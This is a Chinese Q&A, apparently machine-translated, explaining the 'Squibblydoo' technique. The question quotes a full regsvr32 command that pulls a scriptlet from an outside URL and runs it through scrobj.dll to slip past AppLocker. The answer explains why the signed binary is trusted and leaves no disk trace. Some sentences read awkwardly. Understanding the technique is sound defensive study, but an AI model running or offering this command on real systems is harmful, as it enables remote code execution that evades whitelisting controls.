这个AppLocker旁路究竟是如何工作的？(Squibblydoo)

Question

我在几个博客上读到了一个叫做"Squibblydoo“的技巧，下面的命令可以绕过AppLocker：

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

其中，URL指向一个脚本文件，该脚本文件包含打开Powershell的命令(在这种情况下，该脚本文件被AppLocker阻止)。

然而，我在一台Win10机器上试过它，但它没有工作。而且，我也不明白这到底是怎么回事。我只知道它是从服务器中的文件(但也可以是本地文件)调用DllUninstall，并注册scrobj.dll (但我真的不理解这里的关系。scrobj.dll到底在做什么？)由于某种原因，文件中的脚本可以执行，然后可以打开被AppLocker阻塞的应用程序。

Answer 1

Regsvr32是一个受信任的微软二进制文件。

regsvr32是一个windows命令行实用工具，用于将.dll文件和ActiveX控件注册并注销到注册表中。Casey发现，可以通过调用AppLocker实用程序来通过regsrv32文件执行命令或任意代码来绕过.sct脚本规则。这个实用工具有很多好处，因为它是一个受信任的Microsoft二进制文件，代理感知，它支持TLS加密，它遵循重定向，并且它不会在磁盘上留下任何跟踪。

因此，由于它是一个签名的Microsoft二进制Applocker，所以允许它执行。使用scrobj.dll注销注册时执行SCT文件中的代码(相信这不一定是SCT)

Scrobj.dll用于注册和注销COM对象，这是触发COM对象所必需的，因为SCT是COM对象servlet doo-daa。